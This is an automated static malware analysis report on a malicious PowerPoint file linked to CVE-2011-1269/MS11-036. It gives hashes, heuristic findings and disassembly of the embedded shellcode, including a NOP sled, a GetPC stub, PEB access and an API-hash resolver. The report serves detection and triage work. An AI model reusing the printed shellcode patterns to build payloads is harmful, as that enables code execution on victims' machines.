Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bf47306ea5f08229…

MALICIOUS

Office (OLE)

Size: 215.0 KB · Created: 1601-01-01 00:00:00 · Authoring application: Microsoft PowerPoint · First seen: 2012-06-14
MD5: b1607a55e0e9ec04561b4ee61031c27b
SHA-1: 6deb424cfbd0ebd1c44b37210cacf90e6d7d3487
SHA-256: bf47306ea5f0822949bf017621d3f3027d16334c1b12b0089a08d566af654c28
Risk Score: 480

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1055 Process Injection

The file is a PowerPoint document containing a binary-format RCE payload, specifically identified as belonging to the CVE-2011-1269 / MS11-036 family. Static analysis detected raw shellcode, PEB access, and an API hash resolver, indicating the payload is designed to execute arbitrary code. The payload is likely injected into a running process, as suggested by the 'process-injection shellcode' finding.

Heuristics (11)

  • PowerPoint binary-format RCE payload — CVE-2011-1269 / MS11-036 family [critical, CVE likely] PPT_BINARY_MEMORY_CORRUPTION_PAYLOAD
    A macro-free binary PowerPoint (.ppt) document carries a native code payload (embedded PE and/or process-injection shellcode), staged in an oversized binary stream. Legitimate presentations do not embed executables or shellcode; this is the payload half of a PowerPoint memory-corruption exploit (CVE-2011-1269 / MS11-036 family; the same record-overflow delivery is shared with CVE-2010-2572 and CVE-2009-0556).
  • XOR-encoded strings (key 0x92) [critical] SC_XOR_ENCODED
    Found 2 Windows library/API name(s) XOR-encoded with single-byte key 0x92: 'advapi32.dll', 'shell32.dll'
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'xchg' is 55% of instructions — a sled or padding/filler run, not program logic).
  • Embedded Office document has suspicious static findings [critical] EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • NOP sled detected [high] SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly
    x86 disassembly · validity: uncertain (0.662) — 9/11 branch targets land on an instruction boundary (82% coherence)
    00030E2C  90                nop
    00030E2D  90                nop
    00030E2E  90                nop
    00030E2F  90                nop
    00030E30  90                nop
    00030E31  90                nop
    00030E32  90                nop
    00030E33  90                nop
    00030E34  90                nop
    00030E35  90                nop
    00030E36  90                nop
    00030E37  90                nop
    00030E38  90                nop
    00030E39  90                nop
    00030E3A  90                nop
    00030E3B  90                nop
    00030E3C  90                nop
    00030E3D  90                nop
    00030E3E  90                nop
    00030E3F  90                nop
    00030E40  90                nop
    00030E41  90                nop
    00030E42  90                nop
    00030E43  90                nop
    00030E44  90                nop
    00030E45  90                nop
    00030E46  90                nop
    00030E47  90                nop
    00030E48  90                nop
    00030E49  90                nop
    00030E4A  90                nop
    00030E4B  90                nop
    00030E4C  81ec00080000      sub esp, 0x800
    00030E52  60                pushal
    00030E53  e800000000        call 0x30e58
    00030E58  5b                pop ebx
    00030E59  81ebac104000      sub ebx, 0x4010ac
    00030E5F  eb30              jmp 0x30e91
    00030E61  16                push ss
    00030E62  65fa              cli
    00030E64  10ec              adc ah, ch
    00030E66  97                xchg edi, eax
    00030E67  030cf6            add ecx, dword ptr [esi + esi*8]
    00030E6A  22b97cac08da      and bh, byte ptr [ecx - 0x25f75384]
    00030E70  76ad              jbe 0x30e1f
    00030E72  9b                wait
    00030E73  7ddf              jge 0x30e54
    00030E75  fb                sti
    00030E76  97                xchg edi, eax
    00030E77  fd                std
    00030E78  0f7ed8            movd eax, mm3
    00030E7B  e273              loop 0x30ef0
    00030E7D  ff                .byte 0xff
    00030E7E  ff                .byte 0xff
    00030E7F  ff                .byte 0xff
    00030E80  ff                .byte 0xff
    00030E81  ff                .byte 0xff
    00030E82  ff                .byte 0xff
    00030E83  ff                .byte 0xff
    00030E84  ff                .byte 0xff
    00030E85  ff                .byte 0xff
    00030E86  ff                .byte 0xff
    00030E87  ff                .byte 0xff
    00030E88  ff                .byte 0xff
    00030E89  ff                .byte 0xff
    00030E8A  ff                .byte 0xff
    00030E8B  ff                .byte 0xff
  • x86 GetPC stub (CALL $+5; POP EBX) [high] SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EBX)
    Disassembly
    x86 disassembly · validity: uncertain (0.619) — 9/12 branch targets land on an instruction boundary (75% coherence)
    00030E53  e800000000        call 0x30e58
    00030E58  5b                pop ebx
    00030E59  81ebac104000      sub ebx, 0x4010ac
    00030E5F  eb30              jmp 0x30e91
    00030E61  16                push ss
    00030E62  65fa              cli
    00030E64  10ec              adc ah, ch
    00030E66  97                xchg edi, eax
    00030E67  030cf6            add ecx, dword ptr [esi + esi*8]
    00030E6A  22b97cac08da      and bh, byte ptr [ecx - 0x25f75384]
    00030E70  76ad              jbe 0x30e1f
    00030E72  9b                wait
    00030E73  7ddf              jge 0x30e54
    00030E75  fb                sti
    00030E76  97                xchg edi, eax
    00030E77  fd                std
    00030E78  0f7ed8            movd eax, mm3
    00030E7B  e273              loop 0x30ef0
    00030E7D  ff                .byte 0xff
    00030E7E  ff                .byte 0xff
    00030E7F  ff                .byte 0xff
    00030E80  ff                .byte 0xff
    00030E81  ff                .byte 0xff
    00030E82  ff                .byte 0xff
    00030E83  ff                .byte 0xff
    00030E84  ff                .byte 0xff
    00030E85  ff                .byte 0xff
    00030E86  ff                .byte 0xff
    00030E87  ff                .byte 0xff
    00030E88  ff                .byte 0xff
    00030E89  ff                .byte 0xff
    00030E8A  ff                .byte 0xff
    00030E8B  ff                .byte 0xff
    00030E8C  ffa6f3217064      jmp dword ptr [esi + 0x647021f3]
    00030E92  a130000000        mov eax, dword ptr [0x30]
    00030E97  8b400c            mov eax, dword ptr [eax + 0xc]
    00030E9A  8b701c            mov esi, dword ptr [eax + 0x1c]
    00030E9D  ad                lodsd eax, dword ptr [esi]
    00030E9E  8b4008            mov eax, dword ptr [eax + 8]
    00030EA1  8983d1104000      mov dword ptr [ebx + 0x4010d1], eax
    00030EA7  fc                cld
    00030EA8  8dbbb5104000      lea edi, [ebx + 0x4010b5]
    00030EAE  33c9              xor ecx, ecx
    00030EB0  b107              mov cl, 7
    00030EB2  e8                .byte 0xe8
  • PEB access via FS segment (x86) [high] SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (0.944) — 9/10 branch targets land on an instruction boundary (90% coherence)
    00030E91  64a130000000      mov eax, dword ptr fs:[0x30]
    00030E97  8b400c            mov eax, dword ptr [eax + 0xc]
    00030E9A  8b701c            mov esi, dword ptr [eax + 0x1c]
    00030E9D  ad                lodsd eax, dword ptr [esi]
    00030E9E  8b4008            mov eax, dword ptr [eax + 8]
    00030EA1  8983d1104000      mov dword ptr [ebx + 0x4010d1], eax
    00030EA7  fc                cld
    00030EA8  8dbbb5104000      lea edi, [ebx + 0x4010b5]
    00030EAE  33c9              xor ecx, ecx
    00030EB0  b107              mov cl, 7
    00030EB2  e8f0000000        call 0x30fa7
    00030EB7  83c704            add edi, 4
    00030EBA  e2f6              loop 0x30eb2
    00030EBC  fc                cld
    00030EBD  33c0              xor eax, eax
    00030EBF  b4c3              mov ah, 0xc3
    00030EC1  8bb3b5104000      mov esi, dword ptr [ebx + 0x4010b5]
    00030EC7  ac                lodsb al, byte ptr [esi]
    00030EC8  38c4              cmp ah, al
    00030ECA  7402              je 0x30ece
    00030ECC  ebf9              jmp 0x30ec7
    00030ECE  4e                dec esi
    00030ECF  89b3e1104000      mov dword ptr [ebx + 0x4010e1], esi
    00030ED5  33f6              xor esi, esi
    00030ED7  eb1a              jmp 0x30ef3
    00030ED9  6a00              push 0
    00030EDB  56                push esi
    00030EDC  ff93c5104000      call dword ptr [ebx + 0x4010c5]
    00030EE2  3d00500300        cmp eax, 0x35000
    00030EE7  7609              jbe 0x30ef2
    00030EE9  3d00600300        cmp eax, 0x36000
    00030EEE  7302              jae 0x30ef2
    00030EF0  eb                .byte 0xeb
  • PEB API-hash resolver [high] SC_API_HASH_RESOLVER
    PEB access followed by ROR13-style API hashing, a common position-independent shellcode import resolver
    Disassembly
    x86 disassembly · validity: code (0.944) — 9/10 branch targets land on an instruction boundary (90% coherence)
    Same code region as SC_PEB_ACCESS above (00030E91–00030EF0); the listing is identical and is not repeated here.
  • OLE file contains raw shellcode-like resolver payload [high] OLE_RAW_SHELLCODE_PAYLOAD
    Malformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.
  • OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY
    This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. OLE file is 158,720 bytes but its declared streams total only 49,564 bytes — 109,156 bytes (69%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE file has appended executable-looking payload bytes [high] OLE_APPENDED_PAYLOAD
    This finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
  • Suspicious extracted artifact [medium] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: embedded_office_off0000f000.ole
Kind: embedded-office
Source: Embedded OLE/CFB Office body inside OLE container at offset 0xF000
Size: 158720 bytes
SHA-256: ce63127fd658685d5fad80bb8df90292e46b9d3eaa2be9b01d5bc68d17d8b42c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: NOP sled